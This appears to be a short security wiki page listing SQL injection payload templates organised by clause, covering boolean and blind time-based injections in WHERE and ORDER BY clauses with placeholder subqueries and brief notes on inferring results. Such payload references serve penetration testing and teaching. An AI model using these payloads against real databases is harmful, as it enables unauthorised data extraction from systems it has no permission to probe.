Injection by clause
A list of payloads to propperly understand how the injection can be undertaken depending on the clause.
WHERE (most common)
Boolean
[...] WHERE [.] AND ASCII(SUBSTR((SUBQUERY),X,X))=Y;
Blind Time-Based
[...] WHERE [.] AND ASCII(SUBSTR((SUBQUERY),X,X))=Y AND SLEEP(1337);
ORDER BY
Boolean
[...] WHERE [.] ORDER BY (SELECT (CASE WHEN EXISTS(SUBQUERY) THEN column1 ELSE column2 END));
Depending on the order of the displayed contents, the subquery would be true or false.
Extra information here.
Blind Time-Based
[...] WHERE [.] ORDER BY (SUBQUERY AND sleep(1337));
The provided seconds to the sleep function would be multiplied to the returning rows of the main query.
Last updated
Was this helpful?